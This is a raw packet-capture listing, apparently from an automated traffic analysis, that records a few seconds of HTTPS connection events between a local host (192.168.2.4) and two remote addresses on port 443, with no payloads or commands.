                                  Nov 12, 2024 16:42:19.816716909 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.817661047 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.817668915 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.818897963 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.818901062 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.857287884 CET44349802172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:42:19.857332945 CET44349802172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:42:19.857403994 CET49802443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:42:19.864126921 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.864156008 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.864203930 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.864212036 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.864490032 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.864496946 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.864593029 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.864600897 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.864620924 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.864696026 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.867908955 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.867943048 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.868029118 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.868182898 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.868196964 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.937474012 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.937489033 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.937530994 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.937541962 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.937566996 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.937835932 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.937846899 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.937855005 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.937860966 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.943161011 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.943190098 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.943244934 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.943684101 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.943698883 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.952789068 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.952805996 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.952862978 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.952869892 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.953520060 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.953567982 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.953787088 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.953793049 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.953807116 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.953810930 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.957020998 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.957031965 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.957132101 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.957570076 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.957578897 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.182967901 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.183801889 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.183815002 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.184555054 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.184561014 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.324913025 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.325819016 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.325870991 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.330395937 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.330395937 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.330411911 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.330423117 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.349289894 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.349323034 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.349383116 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.350383043 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.350394964 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.394476891 CET49802443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:42:20.394507885 CET44349802172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:42:20.893588066 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.894294977 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.894311905 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:20.895170927 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:20.895175934 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.024878979 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.025238991 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.025249004 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.025640011 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.025645018 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.027477026 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.027523994 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.027592897 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.027756929 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.027765036 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.027776957 CET49848443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.027781010 CET4434984813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.030018091 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.030039072 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.030211926 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.030332088 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.030338049 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.030459881 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.030741930 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.030756950 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.031115055 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.031120062 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.079859972 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.080180883 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.080188990 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.080533028 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.080535889 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.159605026 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.159653902 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.159739017 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.159893036 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.159898043 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.159920931 CET49850443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.159924030 CET4434985013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.162553072 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.162604094 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.162851095 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.162851095 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.162885904 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.164715052 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.164844990 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.164900064 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.164943933 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.164958954 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.164969921 CET49849443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.164977074 CET4434984913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.167068005 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.167087078 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.167186022 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.167327881 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.167339087 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.209125042 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.209497929 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.209552050 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.209598064 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.209611893 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.209621906 CET49851443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.209626913 CET4434985113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.211379051 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.211416960 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.211477041 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.211575031 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.211592913 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.783394098 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.784189939 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.784190893 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.784202099 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.784212112 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.914864063 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.915601969 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.915601969 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.915625095 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.915636063 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.937911987 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.938225985 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.938251972 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.938585997 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.938592911 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.960232973 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.960872889 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.960872889 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.960901022 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.960920095 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.986519098 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.986970901 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.987052917 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.987052917 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.987098932 CET49852443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.987107038 CET4434985213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.989275932 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.989319086 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:21.989531994 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.989675045 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:21.989692926 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.045104980 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.045375109 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.048273087 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.048273087 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.048532963 CET49854443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.048542023 CET4434985413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.050173998 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.050188065 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.050307989 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.052221060 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.052232981 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.081120014 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.082525015 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.082758904 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.082796097 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.082797050 CET49853443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.082815886 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.082827091 CET4434985313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.084635973 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.084681034 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.084841013 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.084871054 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.084877968 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.100703955 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.100749969 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.100908041 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.100908995 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.100960970 CET49855443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.100975037 CET4434985513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.102554083 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.102565050 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.102659941 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.102749109 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.102757931 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.722374916 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.723241091 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.723241091 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.723272085 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.723292112 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.783682108 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.784250021 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.784271955 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.784363985 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.784368992 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.820652008 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.821300983 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.821300983 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.821329117 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.821347952 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.846918106 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.847203970 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.847213984 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.847544909 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.847548962 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.853389978 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.853615046 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.853734970 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.853734970 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.853806019 CET49856443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.853823900 CET4434985613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.855884075 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.855911970 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.856076956 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.856149912 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.856169939 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.913765907 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.913872004 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.913898945 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.913954020 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.914011955 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.914011955 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.914047003 CET49857443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.914055109 CET4434985713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.915771961 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.915801048 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.915894032 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.916112900 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.916127920 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.953632116 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.953677893 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.953816891 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.953816891 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.953876019 CET49858443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.953891993 CET4434985813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.955666065 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.955682993 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.955817938 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.955893040 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.955910921 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.981388092 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.981415033 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.981442928 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.981530905 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.981606960 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.981612921 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.981663942 CET49859443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.981667995 CET4434985913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.983386993 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.983397007 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:22.983577967 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.983577967 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:22.983592987 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.447527885 CET49780443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.449362040 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.449388027 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.449573994 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.449691057 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.449702024 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.591401100 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.591775894 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.591789961 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.592111111 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.592122078 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.647696972 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.648016930 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.648034096 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.648364067 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.648369074 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.685988903 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.686584949 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.686584949 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.686595917 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.686611891 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.703825951 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.704215050 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.704225063 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.704447985 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.704452038 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.723257065 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.723328114 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.723583937 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.723583937 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.723751068 CET49860443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.723762035 CET4434986013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.725538969 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.725569010 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.725807905 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.725807905 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.725835085 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.787542105 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.787590027 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.787744999 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.787745953 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.787817001 CET49861443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.787827015 CET4434986113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.789544106 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.789570093 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.789720058 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.789766073 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.789772987 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.814395905 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.814630985 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.814707994 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.814707994 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.814733028 CET49862443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.814742088 CET4434986213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.816368103 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.816400051 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.816602945 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.816602945 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.816631079 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.831012011 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.831038952 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.831072092 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.831237078 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.831237078 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.831263065 CET49863443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.831268072 CET4434986313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.833059072 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.833093882 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:23.833304882 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.833304882 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:23.833331108 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.161338091 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.161449909 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.162470102 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.162477016 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.162692070 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.163398027 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.211328983 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.289865971 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.289983034 CET49866443192.168.2.413.107.246.45
